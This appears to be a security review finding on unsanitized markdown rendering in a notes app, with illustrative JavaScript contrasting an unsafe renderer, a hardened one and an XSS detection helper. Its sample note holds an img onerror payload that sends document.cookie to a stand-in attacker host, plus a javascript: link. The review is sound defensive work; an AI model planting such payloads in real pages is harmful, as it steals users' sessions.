Unsanitized markdown rendering
The app renders markdown with marked.parse(...) and then injects the resulting HTML string into the DOM with
dangerouslySetInnerHTML.
That happens in at least two important places:
- note viewing
- AI response viewing
I did not see sanitization like DOMPurify.
That means any markdown that reaches the renderer, whether imported, written by a collaborator, or crafted note content, becomes an XSS vector: marked passes raw HTML in the source through by default, so a <script> tag, an inline event handler such as onerror, or a javascript: link in a note lands in the page unchanged and runs in the viewing user's session.
For a notes app with:
- auth
- collaboration
- admin accounts
- secret keys
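To make the failure concrete, here is an added example written for this review, not code from the app: a miniature markdown renderer that, like marked.parse() with default options, passes raw HTML in the note text straight through, beside a hardened render path and a check that a unit test could run over rendered output. The renderer only handles "# " headings, paragraphs and [label](url) links; it is a stand-in for illustration, not marked's or DOMPurify's code, and the note content, attacker hostname and function names are constructed for the example.

```javascript
// Escape the five HTML-significant characters so raw markup in a note is inert text.
function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Link targets allowed in rendered output; javascript:, data:, vbscript: etc. are dropped.
const SAFE_URL = /^(https?:|mailto:|\/)/i;

// [label](url) -> <a href="url">label</a>. In unsafe mode the URL is used verbatim.
function renderLinks(text, safe) {
  return text.replace(/\[([^\]]*)\]\((\S+?)\)(?=\s|$)/g, (_, label, url) => {
    const href = safe ? (SAFE_URL.test(url) ? url : "#") : url;
    return `<a href="${href}">${label}</a>`;
  });
}

// Stand-in renderer: blocks separated by blank lines, "# " headings, otherwise paragraphs.
// With safe=false, raw HTML in the source is copied into the output, as marked does by default.
function renderMarkdown(md, { safe }) {
  const source = safe ? escapeHtml(md) : md;
  return source
    .split(/\n\s*\n/)
    .map((block) => block.trim())
    .filter(Boolean)
    .map((block) =>
      block.startsWith("# ")
        ? `<h1>${renderLinks(block.slice(2), safe)}</h1>`
        : `<p>${renderLinks(block, safe)}</p>`
    )
    .join("\n");
}

// Vulnerable path: what dangerouslySetInnerHTML={{ __html: marked.parse(md) }} hands to the DOM.
function renderNoteUnsafe(md) {
  return renderMarkdown(md, { safe: false });
}

// Hardened path. In the real app the equivalent is DOMPurify.sanitize(marked.parse(md));
// this stand-in escapes raw HTML up front and allowlists link schemes instead.
function renderNoteSafe(md) {
  return renderMarkdown(md, { safe: true });
}

// Test helper: does rendered HTML still carry script-capable markup?
function hasActiveContent(html) {
  return (
    /<script\b/i.test(html) ||
    /<[^>]+\son[a-z]+\s*=/i.test(html) || // inline event handlers such as onerror=
    /href\s*=\s*["']?\s*(javascript|data|vbscript):/i.test(html)
  );
}

// Constructed note content, as an importing collaborator could supply it (attacker.example is fictional).
const craftedNote = [
  "# Sprint notes",
  "",
  'Looks harmless <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  "",
  "[open dashboard](javascript:alert(document.domain))",
].join("\n");

console.log("unsafe:", renderNoteUnsafe(craftedNote));
console.log("safe:  ", renderNoteSafe(craftedNote));
console.log("unsafe carries active content:", hasActiveContent(renderNoteUnsafe(craftedNote)));
console.log("safe carries active content:  ", hasActiveContent(renderNoteSafe(craftedNote)));
```

In the app itself the fix is to sanitize the rendered HTML before it reaches dangerouslySetInnerHTML (DOMPurify.sanitize(marked.parse(md)) in both the note and AI response views), and to keep a check like hasActiveContent over rendered fixtures so a later refactor that drops the sanitizer fails a test. A Content-Security-Policy without 'unsafe-inline' limits the damage but is defence in depth, not a substitute for sanitizing.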